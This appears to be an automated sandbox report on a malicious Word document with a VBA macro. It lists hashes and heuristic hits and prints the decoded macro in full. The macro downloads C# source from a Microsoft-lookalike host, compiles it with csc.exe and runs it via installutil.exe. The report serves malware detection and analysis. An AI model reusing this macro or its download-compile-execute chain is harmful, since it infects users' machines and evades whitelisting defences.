Office (OOXML) malware analysis — malicious · 076c8e58e028b909

MALICIOUS

Office (OOXML)

157.4 KB Created: 2020-12-30 21:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-01-15

MD5: f0673423e415d35d3bb6c2d871c6c966 SHA-1: 23978ed48d4dac75bd55d60679478854589b43af SHA-256: 076c8e58e028b9095a106a067452bb072b3753a3bd6520196f3077329546ce91

222 Risk Score

Heuristics 6

VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

    wshinfo.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe", "/LogToConsole=false /Logfile= /u updater.exe", getUserLocation(), "open", 0

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
        .write xHttp.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
  Set fso2 = CreateObject("Scripting.FileSystemObject")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- https://tw-ms-update.azureedge.netReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2064 bytes
SHA-256: `9512a78dbcd62ef7675ded6172d656fd4fc22170a60930bac9dbde33dc8984ae`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "CommandButton11, 1, 0, MSForms, CommandButton" Attribute VB_Control = "CommandButton1, 0, 1, MSForms, CommandButton" #If VBA7 Then Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) #Else Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) #End If Function getUserLocation() Dim fso2 Set fso2 = CreateObject("Scripting.FileSystemObject") Location = "C:\\Users\\" + getUser() getUserLocation = fso2.GetAbsolutePathName(Location) End Function Function getUser() Set objSysInfo = CreateObject("WinNTSystemInfo") getUser = objSysInfo.UserName End Function Function findImages(imagePath, imagePlace) Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") xHttp.Open "GET", imagePath, False xHttp.Send With bStrm .Type = 1 '//binary .Open .write xHttp.responseBody .SaveToFile imagePlace, 2 '//overwrite End With End Function Public Function Info() As Variant trainingRepo = "https://tw-ms-update.azureedge.net" Call findImages(trainingRepo + "/updaterepo/updater.cs", getUserLocation() + "\\updater.cs") Sleep 2000 Set wshinfo = CreateObject("Shell.Application") wshinfo.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", "updater.cs", getUserLocation(), "open", 0 Sleep 2000 wshinfo.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe", "/LogToConsole=false /Logfile= /u updater.exe", getUserLocation(), "open", 0 Application.Quit End Function Private Sub CommandButton1_Click() Info End Sub Private Sub CommandButton11_Click() Info End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	15360 bytes
SHA-256: `c2a5aaeffef9645edf881594ae4199a65058137efcea68620422c685a66154fb`

Open this report in the interactive analyzer, or submit your own file for analysis.